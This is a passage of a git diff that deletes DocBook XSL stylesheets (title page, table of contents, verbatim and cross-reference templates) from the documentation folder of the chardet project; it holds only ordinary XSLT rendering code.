match="othername" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="pagenums" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="printhistory" mode="titlepage.mode"> - <div class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - </div> -</xsl:template> - -<xsl:template match="productname" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="productnumber" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="pubdate" mode="titlepage.mode"> - <xsl:call-template name="paragraph"> - <xsl:with-param name="class" select="name(.)"/> - <xsl:with-param name="content"> - <xsl:apply-templates mode="titlepage.mode"/> - </xsl:with-param> - </xsl:call-template> -</xsl:template> - -<xsl:template match="publisher" mode="titlepage.mode"> - <xsl:call-template name="paragraph"> - <xsl:with-param name="class" select="name(.)"/> - <xsl:with-param name="content"> - <xsl:apply-templates mode="titlepage.mode"/> - </xsl:with-param> - </xsl:call-template> -</xsl:template> - -<xsl:template match="publishername" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="pubsnumber" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="releaseinfo" mode="titlepage.mode"> - <xsl:call-template name="paragraph"> - <xsl:with-param name="class" select="name(.)"/> - <xsl:with-param name="content"> - <xsl:apply-templates mode="titlepage.mode"/> - </xsl:with-param> - </xsl:call-template> -</xsl:template> - -<xsl:template match="revhistory" mode="titlepage.mode"> - <xsl:variable name="numcols"> - <xsl:choose> - <xsl:when test="//authorinitials">3</xsl:when> - <xsl:otherwise>2</xsl:otherwise> - </xsl:choose> - </xsl:variable> - - <div class="{name(.)}"> - <table border="1" width="100%" summary="Revision history"> - <tr> - <th align="left" valign="top" colspan="{$numcols}"> - <b> - <xsl:call-template name="gentext"> - <xsl:with-param name="key" select="'RevHistory'"/> - </xsl:call-template> - </b> - </th> - </tr> - <xsl:apply-templates mode="titlepage.mode"> - <xsl:with-param name="numcols" select="$numcols"/> - </xsl:apply-templates> - </table> - </div> -</xsl:template> - -<xsl:template match="revhistory/revision" mode="titlepage.mode"> - <xsl:param name="numcols" select="'3'"/> - <xsl:variable name="revnumber" select=".//revnumber"/> - <xsl:variable name="revdate" select=".//date"/> - <xsl:variable name="revauthor" select=".//authorinitials"/> - <xsl:variable name="revremark" select=".//revremark|.//revdescription"/> - <tr> - <td align="left"> - <xsl:if test="$revnumber"> - <xsl:call-template name="gentext"> - <xsl:with-param name="key" select="'Revision'"/> - </xsl:call-template> - <xsl:call-template name="gentext.space"/> - <xsl:apply-templates select="$revnumber[1]" mode="titlepage.mode"/> - </xsl:if> - </td> - <td align="left"> - <xsl:apply-templates select="$revdate[1]" mode="titlepage.mode"/> - </td> - <xsl:choose> - <xsl:when test="$revauthor"> - <td align="left"> - <xsl:apply-templates select="$revauthor[1]" mode="titlepage.mode"/> - </td> - </xsl:when> - <xsl:when test="$numcols > 2"> - <td> </td> - </xsl:when> - <xsl:otherwise></xsl:otherwise> - </xsl:choose> - </tr> - <xsl:if test="$revremark"> - <tr> - <td align="left" colspan="{$numcols}"> - <xsl:apply-templates select="$revremark[1]" mode="titlepage.mode"/> - </td> - </tr> - </xsl:if> -</xsl:template> - -<xsl:template match="revision/revnumber" mode="titlepage.mode"> - <xsl:apply-templates mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="revision/date" mode="titlepage.mode"> - <xsl:apply-templates mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="revision/authorinitials" mode="titlepage.mode"> - <xsl:apply-templates mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="revision/revremark" mode="titlepage.mode"> - <xsl:apply-templates mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="revision/revdescription" mode="titlepage.mode"> - <xsl:apply-templates mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="seriesvolnums" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="shortaffil" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="subjectset" mode="titlepage.mode"> -</xsl:template> - -<xsl:template match="subtitle" mode="titlepage.mode"> - <h2 class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - </h2> -</xsl:template> - -<xsl:template match="surname" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="title" mode="titlepage.mode"> - <xsl:variable name="id"> - <xsl:choose> - <!-- if title is in an *info wrapper, get the grandparent --> - <xsl:when test="contains(local-name(..), 'info')"> - <xsl:call-template name="object.id"> - <xsl:with-param name="object" select="../.."/> - </xsl:call-template> - </xsl:when> - <xsl:otherwise> - <xsl:call-template name="object.id"> - <xsl:with-param name="object" select=".."/> - </xsl:call-template> - </xsl:otherwise> - </xsl:choose> - </xsl:variable> - - <h1 class="{name(.)}"> - <a name="{$id}"/> - <xsl:choose> - <xsl:when test="$show.revisionflag != 0 and @revisionflag"> - <span class="{@revisionflag}"> - <xsl:apply-templates mode="titlepage.mode"/> - </span> - </xsl:when> - <xsl:otherwise> - <xsl:apply-templates mode="titlepage.mode"/> - </xsl:otherwise> - </xsl:choose> - </h1> -</xsl:template> - -<xsl:template match="titleabbrev" mode="titlepage.mode"> - <!-- nop; title abbreviations don't belong on the title page! --> -</xsl:template> - -<xsl:template match="volumenum" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<!-- ==================================================================== --> - -</xsl:stylesheet> diff --git a/chardet/docs/docbook/xsl/html/toc.xsl b/chardet/docs/docbook/xsl/html/toc.xsl deleted file mode 100644 index f83e368..0000000 --- a/chardet/docs/docbook/xsl/html/toc.xsl +++ /dev/null @@ -1,173 +0,0 @@ -<?xml version='1.0'?> -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" - version='1.0'> - -<!-- ******************************************************************** - $Id: toc.xsl,v 1.1.1.1 2004/06/22 02:10:35 f8dy Exp $ - ******************************************************************** - - This file is part of the XSL DocBook Stylesheet distribution. - See ../README or http://nwalsh.com/docbook/xsl/ for copyright - and other information. - - ******************************************************************** --> - -<!-- ==================================================================== --> - -<xsl:template match="toc"> - <xsl:choose> - <xsl:when test="*"> - <xsl:if test="$process.source.toc != 0"> - <!-- if the toc isn't empty, process it --> - <xsl:element name="{$toc.list.type}"> - <xsl:apply-templates/> - </xsl:element> - </xsl:if> - </xsl:when> - <xsl:otherwise> - <xsl:if test="$process.empty.source.toc != 0"> - <xsl:choose> - <xsl:when test="parent::section - or parent::sect1 - or parent::sect2 - or parent::sect3 - or parent::sect4 - or parent::sect5"> - <xsl:apply-templates select="parent::*" - mode="toc.for.section"/> - </xsl:when> - <xsl:when test="parent::article"> - <xsl:apply-templates select="parent::*" - mode="toc.for.component"/> - </xsl:when> - <xsl:when test="parent::book - or parent::part"> - <xsl:apply-templates select="parent::*" - mode="toc.for.division"/> - </xsl:when> - <xsl:when test="parent::set"> - <xsl:apply-templates select="parent::*" - mode="toc.for.set"/> - </xsl:when> - <!-- there aren't any other contexts that allow toc --> - <xsl:otherwise> - <xsl:message> - <xsl:text>I don't know how to make a TOC in this context!</xsl:text> - </xsl:message> - </xsl:otherwise> - </xsl:choose> - </xsl:if> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - -<xsl:template match="tocpart|tocchap - |toclevel1|toclevel2|toclevel3|toclevel4|toclevel5"> - <xsl:variable name="sub-toc"> - <xsl:if test="tocchap|toclevel1|toclevel2|toclevel3|toclevel4|toclevel5"> - <xsl:choose> - <xsl:when test="$toc.list.type = 'dl'"> - <dd> - <xsl:element name="{$toc.list.type}"> - <xsl:apply-templates select="tocchap|toclevel1|toclevel2|toclevel3|toclevel4|toclevel5"/> - </xsl:element> - </dd> - </xsl:when> - <xsl:otherwise> - <xsl:element name="{$toc.list.type}"> - <xsl:apply-templates select="tocchap|toclevel1|toclevel2|toclevel3|toclevel4|toclevel5"/> - </xsl:element> - </xsl:otherwise> - </xsl:choose> - </xsl:if> - </xsl:variable> - - <xsl:apply-templates select="tocentry[position() != last()]"/> - - <xsl:choose> - <xsl:when test="$toc.list.type = 'dl'"> - <dt> - <xsl:apply-templates select="tocentry[position() = last()]"/> - </dt> - <xsl:copy-of select="$sub-toc"/> - </xsl:when> - <xsl:otherwise> - <li> - <xsl:apply-templates select="tocentry[position() = last()]"/> - <xsl:copy-of select="$sub-toc"/> - </li> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - -<xsl:template match="tocentry|tocfront|tocback"> - <xsl:choose> - <xsl:when test="$toc.list.type = 'dl'"> - <dt> - <xsl:call-template name="tocentry-content"/> - </dt> - </xsl:when> - <xsl:otherwise> - <li> - <xsl:call-template name="tocentry-content"/> - </li> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - -<xsl:template match="tocentry[position() = last()]" priority="2"> - <xsl:call-template name="tocentry-content"/> -</xsl:template> - -<xsl:template name="tocentry-content"> - <xsl:variable name="targets" select="key('id',@linkend)"/> - <xsl:variable name="target" select="$targets[1]"/> - - <xsl:choose> - <xsl:when test="@linkend"> - <xsl:call-template name="check.id.unique"> - <xsl:with-param name="linkend" select="@linkend"/> - </xsl:call-template> - <a> - <xsl:attribute name="href"> - <xsl:call-template name="href.target"> - <xsl:with-param name="object" select="$target"/> - </xsl:call-template> - </xsl:attribute> - <xsl:apply-templates/> - </a> - </xsl:when> - <xsl:otherwise> - <xsl:apply-templates/> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - -<!-- ==================================================================== --> - -<xsl:template match="*" mode="toc.for.section"> - <xsl:call-template name="section.toc"/> -</xsl:template> - -<xsl:template match="*" mode="toc.for.component"> - <xsl:call-template name="component.toc"/> -</xsl:template> - -<xsl:template match="*" mode="toc.for.section"> - <xsl:call-template name="section.toc"/> -</xsl:template> - -<xsl:template match="*" mode="toc.for.division"> - <xsl:call-template name="division.toc"/> -</xsl:template> - -<xsl:template match="*" mode="toc.for.set"> - <xsl:call-template name="set.toc"/> -</xsl:template> - -<!-- ==================================================================== --> - -<xsl:template match="lot|lotentry"> -</xsl:template> - -</xsl:stylesheet> diff --git a/chardet/docs/docbook/xsl/html/verbatim.xsl b/chardet/docs/docbook/xsl/html/verbatim.xsl deleted file mode 100644 index 4665d54..0000000 --- a/chardet/docs/docbook/xsl/html/verbatim.xsl +++ /dev/null @@ -1,382 +0,0 @@ -<?xml version='1.0'?> -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" - xmlns:sverb="http://nwalsh.com/xslt/ext/com.nwalsh.saxon.Verbatim" - xmlns:xverb="com.nwalsh.xalan.Verbatim" - xmlns:lxslt="http://xml.apache.org/xslt" - xmlns:exsl="http://exslt.org/common" - exclude-result-prefixes="sverb xverb lxslt exsl" - version='1.0'> - -<!-- ******************************************************************** - $Id: verbatim.xsl,v 1.1.1.1 2004/06/22 02:10:36 f8dy Exp $ - ******************************************************************** - - This file is part of the XSL DocBook Stylesheet distribution. - See ../README or http://nwalsh.com/docbook/xsl/ for copyright - and other information. - - ******************************************************************** --> - -<lxslt:component prefix="xverb" - functions="numberLines"/> - -<xsl:template match="programlisting|screen|synopsis"> - <xsl:param name="suppress-numbers" select="'0'"/> - <xsl:variable name="id"> - <xsl:call-template name="object.id"/> - </xsl:variable> - - <xsl:call-template name="anchor"/> - - <xsl:variable name="content"> - <xsl:choose> - <xsl:when test="$suppress-numbers = '0' - and @linenumbering = 'numbered' - and $use.extensions != '0' - and $linenumbering.extension != '0'"> - <xsl:variable name="rtf"> - <xsl:apply-templates/> - </xsl:variable> - <pre class="{name(.)}"> - <xsl:call-template name="number.rtf.lines"> - <xsl:with-param name="rtf" select="$rtf"/> - </xsl:call-template> - </pre> - </xsl:when> - <xsl:otherwise> - <pre class="{name(.)}"> - <xsl:apply-templates/> - </pre> - </xsl:otherwise> - </xsl:choose> - </xsl:variable> - - <xsl:choose> - <xsl:when test="$shade.verbatim != 0"> - <table xsl:use-attribute-sets="shade.verbatim.style"> - <tr> - <td> - <xsl:copy-of select="$content"/> - </td> - </tr> - </table> - </xsl:when> - <xsl:otherwise> - <xsl:copy-of select="$content"/> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - -<xsl:template match="literallayout"> - <xsl:param name="suppress-numbers" select="'0'"/> - - <xsl:variable name="rtf"> - <xsl:apply-templates/> - </xsl:variable> - - <xsl:variable name="content"> - <xsl:choose> - <xsl:when test="$suppress-numbers = '0' - and @linenumbering = 'numbered' - and $use.extensions != '0' - and $linenumbering.extension != '0'"> - <xsl:choose> - <xsl:when test="@class='monospaced'"> - <pre class="{name(.)}"> - <xsl:call-template name="number.rtf.lines"> - <xsl:with-param name="rtf" select="$rtf"/> - </xsl:call-template> - </pre> - </xsl:when> - <xsl:otherwise> - <div class="{name(.)}"> - <p> - <xsl:call-template name="number.rtf.lines"> - <xsl:with-param name="rtf" select="$rtf"/> - </xsl:call-template> - </p> - </div> - </xsl:otherwise> - </xsl:choose> - </xsl:when> - - <xsl:otherwise> - <xsl:choose> - <xsl:when test="@class='monospaced'"> - <pre class="{name(.)}"> - <xsl:copy-of select="$rtf"/> - </pre> - </xsl:when> - <xsl:otherwise> - <div class="{name(.)}"> - <p> - <xsl:call-template name="make-verbatim"> - <xsl:with-param name="rtf" select="$rtf"/> - </xsl:call-template> - </p> - </div> - </xsl:otherwise> - </xsl:choose> - </xsl:otherwise> - </xsl:choose> - </xsl:variable> - - <xsl:choose> - <xsl:when test="$shade.verbatim != 0 and @class='monospaced'"> - <table xsl:use-attribute-sets="shade.verbatim.style"> - <tr> - <td> - <xsl:copy-of select="$content"/> - </td> - </tr> - </table> - </xsl:when> - <xsl:otherwise> - <xsl:copy-of select="$content"/> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - -<xsl:template match="address"> - <xsl:param name="suppress-numbers" select="'0'"/> - - <xsl:variable name="rtf"> - <xsl:apply-templates/> - </xsl:variable> - - <xsl:choose> - <xsl:when test="$suppress-numbers = '0' - and @linenumbering = 'numbered' - and $use.extensions != '0' - and $linenumbering.extension != '0'"> - <div class="{name(.)}"> - <p> - <xsl:call-template name="number.rtf.lines"> - <xsl:with-param name="rtf" select="$rtf"/> - </xsl:call-template> - </p> - </div> - </xsl:when> - - <xsl:otherwise> - <div class="{name(.)}"> - <p> - <xsl:call-template name="make-verbatim"> - <xsl:with-param name="rtf" select="$rtf"/> - </xsl:call-template> - </p> - </div> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - -<xsl:template name="number.rtf.lines"> - <xsl:param name="rtf" select="''"/> - <xsl:param name="pi.context" select="."/> - - <!-- Save the global values --> - <xsl:variable name="global.linenumbering.everyNth" - select="$linenumbering.everyNth"/> - - <xsl:variable name="global.linenumbering.separator" - select="$linenumbering.separator"/> - - <xsl:variable name="global.linenumbering.width" - select="$linenumbering.width"/> - - <!-- Extract the <?dbhtml linenumbering.*?> PI values --> - <xsl:variable name="pi.linenumbering.everyNth"> - <xsl:call-template name="dbhtml-attribute"> - <xsl:with-param name="pis" - select="$pi.context/processing-instruction('dbhtml')"/> - <xsl:with-param name="attribute" select="'linenumbering.everyNth'"/> - </xsl:call-template> - </xsl:variable> - - <xsl:variable name="pi.linenumbering.separator"> - <xsl:call-template name="dbhtml-attribute"> - <xsl:with-param name="pis" - select="$pi.context/processing-instruction('dbhtml')"/> - <xsl:with-param name="attribute" select="'linenumbering.separator'"/> - </xsl:call-template> - </xsl:variable> - - <xsl:variable name="pi.linenumbering.width"> - <xsl:call-template name="dbhtml-attribute"> - <xsl:with-param name="pis" - select="$pi.context/processing-instruction('dbhtml')"/> - <xsl:with-param name="attribute" select="'linenumbering.width'"/> - </xsl:call-template> - </xsl:variable> - - <!-- Construct the 'in-context' values --> - <xsl:variable name="linenumbering.everyNth"> - <xsl:choose> - <xsl:when test="$pi.linenumbering.everyNth != ''"> - <xsl:value-of select="$pi.linenumbering.everyNth"/> - </xsl:when> - <xsl:otherwise> - <xsl:value-of select="$global.linenumbering.everyNth"/> - </xsl:otherwise> - </xsl:choose> - </xsl:variable> - - <xsl:variable name="linenumbering.separator"> - <xsl:choose> - <xsl:when test="$pi.linenumbering.separator != ''"> - <xsl:value-of select="$pi.linenumbering.separator"/> - </xsl:when> - <xsl:otherwise> - <xsl:value-of select="$global.linenumbering.separator"/> - </xsl:otherwise> - </xsl:choose> - </xsl:variable> - - <xsl:variable name="linenumbering.width"> - <xsl:choose> - <xsl:when test="$pi.linenumbering.width != ''"> - <xsl:value-of select="$pi.linenumbering.width"/> - </xsl:when> - <xsl:otherwise> - <xsl:value-of select="$global.linenumbering.width"/> - </xsl:otherwise> - </xsl:choose> - </xsl:variable> - - <xsl:variable name="linenumbering.startinglinenumber"> - <xsl:choose> - <xsl:when test="@startinglinenumber"> - <xsl:value-of select="@startinglinenumber"/> - </xsl:when> - <xsl:when test="@continuation='continues'"> - <xsl:variable name="lastLine"> - <xsl:choose> - <xsl:when test="self::programlisting"> - <xsl:call-template name="lastLineNumber"> - <xsl:with-param name="listings" - select="preceding::programlisting[@linenumbering='numbered']"/> - </xsl:call-template> - </xsl:when> - <xsl:when test="self::screen"> - <xsl:call-template name="lastLineNumber"> - <xsl:with-param name="listings" - select="preceding::screen[@linenumbering='numbered']"/> - </xsl:call-template> - </xsl:when> - <xsl:when test="self::literallayout"> - <xsl:call-template name="lastLineNumber"> - <xsl:with-param name="listings" - select="preceding::literallayout[@linenumbering='numbered']"/> - </xsl:call-template> - </xsl:when> - <xsl:when test="self::address"> - <xsl:call-template name="lastLineNumber"> - <xsl:with-param name="listings" - select="preceding::address[@linenumbering='numbered']"/> - </xsl:call-template> - </xsl:when> - <xsl:when test="self::synopsis"> - <xsl:call-template name="lastLineNumber"> - <xsl:with-param name="listings" - select="preceding::synopsis[@linenumbering='numbered']"/> - </xsl:call-template> - </xsl:when> - <xsl:otherwise> - <xsl:message> - <xsl:text>Unexpected verbatim environment: </xsl:text> - <xsl:value-of select="local-name(.)"/> - </xsl:message> - <xsl:value-of select="0"/> - </xsl:otherwise> - </xsl:choose> - </xsl:variable> - - <xsl:value-of select="$lastLine + 1"/> - </xsl:when> - <xsl:otherwise>1</xsl:otherwise> - </xsl:choose> - </xsl:variable> - - <xsl:choose> - <xsl:when test="function-available('sverb:numberLines')"> - <xsl:copy-of select="sverb:numberLines($rtf)"/> - </xsl:when> - <xsl:when test="function-available('xverb:numberLines')"> - <xsl:copy-of select="xverb:numberLines($rtf)"/> - </xsl:when> - <xsl:otherwise> - <xsl:message terminate="yes"> - <xsl:text>No numberLines function available.</xsl:text> - </xsl:message> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - -<xsl:template name="make-verbatim"> - <xsl:param name="rtf"/> - - <!-- I want to make this RTF verbatim. There are two possibilities: either - I have access to the exsl:node-set extension function and I can "do it right" - or I have to rely on CSS. --> - - <xsl:choose> - <xsl:when test="function-available('exsl:node-set')"> - <xsl:apply-templates select="exsl:node-set($rtf)" mode="make.verbatim.mode"/> - </xsl:when> - <xsl:otherwise> - <span style="white-space: pre;"> - <xsl:copy-of select="$rtf"/> - </span> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - -<!-- ======================================================================== --> - -<xsl:template name="lastLineNumber"> - <xsl:param name="listings"/> - <xsl:param name="number" select="0"/> - - <xsl:variable name="lines"> - <xsl:call-template name="countLines"> - <xsl:with-param name="listing" select="string($listings[1])"/> - </xsl:call-template> - </xsl:variable> - - <xsl:choose> - <xsl:when test="not($listings)"> - <xsl:value-of select="$number"/> - </xsl:when> - <xsl:when test="$listings[1]/@startinglinenumber"> - <xsl:value-of select="$number + $listings[1]/@startinglinenumber + $lines - 1"/> - </xsl:when> - <xsl:when test="$listings[1]/@continuation='continues'"> - <xsl:call-template name="lastLineNumber"> - <xsl:with-param name="listings" select="listings[position() > 1]"/> - <xsl:with-param name="number" select="$number + $lines"/> - </xsl:call-template> - </xsl:when> - <xsl:otherwise> - <xsl:value-of select="$lines"/> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - -<xsl:template name="countLines"> - <xsl:param name="listing"/> - <xsl:param name="count" select="1"/> - - <xsl:choose> - <xsl:when test="contains($listing, ' ')"> - <xsl:call-template name="countLines"> - <xsl:with-param name="listing" select="substring-after($listing, ' ')"/> - <xsl:with-param name="count" select="$count + 1"/> - </xsl:call-template> - </xsl:when> - <xsl:otherwise> - <xsl:value-of select="$count"/> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - -</xsl:stylesheet> diff --git a/chardet/docs/docbook/xsl/html/xref.xsl b/chardet/docs/docbook/xsl/html/xref.xsl deleted file mode 100644 index 593da7a..0000000 --- a/chardet/docs/docbook/xsl/html/xref.xsl +++ /dev/null @@ -1,1306 +0,0 @@ -<?xml version='1.0'?> -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" - xmlns:suwl="http://nwalsh.com/xslt/ext/com.nwalsh.saxon.UnwrapLinks" - xmlns:exsl="http://exslt.org/common" - exclude-result-prefixes="suwl exsl" - version='1.0'> - -<!-- ******************************************************************** - $Id: xref.xsl,v 1.1.1.1 2004/06/22 02:10:37 f8dy Exp $ - ******************************************************************** - - This file is part of the XSL DocBook Stylesheet distribution. - See ../README or http://nwalsh.com/docbook/xsl/ for copyright - and other information. - - ******************************************************************** --> - -<!-- ==================================================================== --> - -<!-- Create keys for quickly looking up olink targets --> -<xsl:key name="targetdoc-key" match="document" use="@targetdoc" /> -<xsl:key name="targetptr-key" match="div|obj" - use="concat(ancestor::document/@targetdoc, '/', @targetptr)" /> - -<xsl:template match="anchor"> - <xsl:call-template name="anchor"/> -</xsl:template> - -<!-- ==================================================================== --> - -<xsl:template match="xref" name="xref"> - <xsl:variable name="targets" select="key('id',@linkend)"/> - <xsl:variable name="target" select="$targets[1]"/> - <xsl:variable name="refelem" select="local-name($target)"/> - - <xsl:call-template name="check.id.unique"> - <xsl:with-param name="linkend" select="@linkend"/> - </xsl:call-template> - - <xsl:call-template name="anchor"/> - - <xsl:choose> - <xsl:when test="count($target) = 0"> - <xsl:message> - <xsl:text>XRef to nonexistent id: </xsl:text> - <xsl:value-of select="@linkend"/> - </xsl:message> - <xsl:text>???</xsl:text> - </xsl:when> - - <xsl:when test="@endterm"> - <xsl:variable name="href"> - <xsl:call-template name="href.target"> - <xsl:with-param name="object" select="$target"/> - </xsl:call-template> - </xsl:variable> - - <xsl:variable name="etargets" select="key('id',@endterm)"/> - <xsl:variable name="etarget" select="$etargets[1]"/> - <xsl:choose> - <xsl:when test="count($etarget) = 0"> - <xsl:message> - <xsl:value-of select="count($etargets)"/> - <xsl:text>Endterm points to nonexistent ID: </xsl:text> - <xsl:value-of select="@endterm"/> - </xsl:message> - <a href="{$href}"> - <xsl:text>???</xsl:text> - </a> - </xsl:when> - <xsl:otherwise> - <a href="{$href}"> - <xsl:apply-templates select="$etarget" mode="endterm"/> - </a> - </xsl:otherwise> - </xsl:choose> - </xsl:when> - - <xsl:when test="$target/@xreflabel"> - <a> - <xsl:attribute name="href"> - <xsl:call-template name="href.target"> - <xsl:with-param name="object" select="$target"/> - </xsl:call-template> - </xsl:attribute> - <xsl:call-template name="xref.xreflabel"> - <xsl:with-param name="target" select="$target"/> - </xsl:call-template> - </a> - </xsl:when> - - <xsl:otherwise> - <xsl:variable name="href"> - <xsl:call-template name="href.target"> - <xsl:with-param name="object" select="$target"/> - </xsl:call-template> - </xsl:variable> - - <xsl:apply-templates select="$target" mode="xref-to-prefix"/> - - <a href="{$href}"> - <xsl:if test="$target/title or $target/*/title"> - <xsl:attribute name="title"> - <xsl:apply-templates select="$target" mode="xref-title"/> - </xsl:attribute> - </xsl:if> - <xsl:apply-templates select="$target" mode="xref-to"> - <xsl:with-param name="referrer" select="."/> - <xsl:with-param name="xrefstyle"> - <xsl:choose> - <xsl:when test="@role and not(@xrefstyle) and $use.role.as.xrefstyle != 0"> - <xsl:value-of select="@role"/> - </xsl:when> - <xsl:otherwise> - <xsl:value-of select="@xrefstyle"/> - </xsl:otherwise> - </xsl:choose> - </xsl:with-param> - </xsl:apply-templates> - </a> - - <xsl:apply-templates select="$target" mode="xref-to-suffix"/> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - -<!-- ==================================================================== --> - -<xsl:template match="*" mode="endterm"> - <!-- Process the children of the endterm element --> - <xsl:variable name="endterm"> - <xsl:apply-templates select="child::node()"/> - </xsl:variable> - - <xsl:choose> - <xsl:when test="function-available('exsl:node-set')"> - <xsl:apply-templates select="exsl:node-set($endterm)" mode="remove-ids"/> - </xsl:when> - <xsl:otherwise> - <xsl:copy-of select="$endterm"/> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - -<xsl:template match="*" mode="remove-ids"> - <xsl:choose> - <!-- handle html or xhtml --> - <xsl:when test="local-name(.) = 'a' - and (namespace-uri(.) = '' - or namespace-uri(.) = 'http://www.w3.org/1999/xhtml')"> - <xsl:choose> - <xsl:when test="(@name and count(@*) = 1) - or (@id and count(@*) = 1) - or (@id and @name and count(@*) = 2)"> - <xsl:message>suppress anchor</xsl:message> - <!-- suppress the whole thing --> - </xsl:when> - <xsl:otherwise> - <xsl:copy> - <xsl:for-each select="@*"> - <xsl:choose> - <xsl:when test="name(.) != 'name' and name(.) != 'id'"> - <xsl:copy/> - </xsl:when> - <xsl:otherwise> - <xsl:message>removing <xsl:value-of select="name(.)"/></xsl:message> - </xsl:otherwise> - </xsl:choose> - </xsl:for-each> - </xsl:copy> - <xsl:apply-templates mode="remove-ids"/> - </xsl:otherwise> - </xsl:choose> - </xsl:when> - <xsl:otherwise> - <xsl:copy> - <xsl:for-each select="@*"> - <xsl:choose> - <xsl:when test="name(.) != 'id'"> - <xsl:copy/> - </xsl:when> - <xsl:otherwise> - <xsl:message>removing <xsl:value-of select="name(.)"/></xsl:message> - </xsl:otherwise> - </xsl:choose> - </xsl:for-each> - <xsl:apply-templates mode="remove-ids"/> - </xsl:copy> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - -<!-- ==================================================================== --> - -<xsl:template match="*" mode="xref-to-prefix"/> -<xsl:template match="*" mode="xref-to-suffix"/> - -<xsl:template match="*" mode="xref-to"> - <xsl:param name="referrer"/> - <xsl:param name="xrefstyle"/> - <xsl:param name="verbose" select="1"/> - - <xsl:if test="$verbose"> - <xsl:message> - <xsl:text>Don't know what gentext to create for xref to: "</xsl:text> - <xsl:value-of select="name(.)"/> - <xsl:text>", ("</xsl:text> - <xsl:value-of select="@id"/> - <xsl:text>")</xsl:text> - </xsl:message> - </xsl:if> - <xsl:text>???</xsl:text> -</xsl:template> - -<xsl:template match="title" mode="xref-to"> - <xsl:param name="referrer"/> - <xsl:param name="xrefstyle"/> - - <!-- if you xref to a title, xref to the parent... --> - <xsl:choose> - <!-- FIXME: how reliable is this? --> - <xsl:when test="contains(local-name(parent::*), 'info')"> - <xsl:apply-templates select="parent::*[2]" mode="xref-to"> - <xsl:with-param name="referrer" select="$referrer"/> - <xsl:with-param name="xrefstyle" select="$xrefstyle"/> - </xsl:apply-templates> - </xsl:when> - <xsl:otherwise> - <xsl:apply-templates select="parent::*" mode="xref-to"> - <xsl:with-param name="referrer" select="$referrer"/> - <xsl:with-param name="xrefstyle" select="$xrefstyle"/> - </xsl:apply-templates> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - -<xsl:template match="abstract|authorblurb|personblurb|bibliodiv|bibliomset - |biblioset|blockquote|calloutlist|caution|colophon - |constraintdef|formalpara|glossdiv|important|indexdiv - |itemizedlist|legalnotice|lot|msg|msgexplan|msgmain - |msgrel|msgset|msgsub|note|orderedlist|partintro - |productionset|qandadiv|refsynopsisdiv|segmentedlist - |set|setindex|sidebar|tip|toc|variablelist|warning" - mode="xref-to"> - <xsl:param name="referrer"/> - <xsl:param name="xrefstyle"/> - - <!-- catch-all for things with (possibly optional) titles --> - <xsl:apply-templates select="." mode="object.xref.markup"> - <xsl:with-param name="purpose" select="'xref'"/> - <xsl:with-param name="xrefstyle" select="$xrefstyle"/> - <xsl:with-param name="referrer" select="$referrer"/> - </xsl:apply-templates> -</xsl:template> - -<xsl:template match="author|editor|othercredit|personname" mode="xref-to"> - <xsl:param name="referrer"/> - <xsl:param name="xrefstyle"/> - - <xsl:call-template name="person.name"/> -</xsl:template> - -<xsl:template match="authorgroup" mode="xref-to"> - <xsl:param name="referrer"/> - <xsl:param name="xrefstyle"/> - - <xsl:call-template name="person.name.list"/> -</xsl:template> - -<xsl:template match="figure|example|table|equation" mode="xref-to"> - <xsl:param name="referrer"/> - <xsl:param name="xrefstyle"/> - - <xsl:apply-templates select="." mode="object.xref.markup"> - <xsl:with-param name="purpose" select="'xref'"/> - <xsl:with-param name="xrefstyle" select="$xrefstyle"/> - <xsl:with-param name="referrer" select="$referrer"/> - </xsl:apply-templates> -</xsl:template> - -<xsl:template match="procedure" mode="xref-to"> - <xsl:param name="referrer"/> - <xsl:param name="xrefstyle"/> - - <xsl:apply-templates select="." mode="object.xref.markup"> - <xsl:with-param name="purpose" select="'xref'"/> - 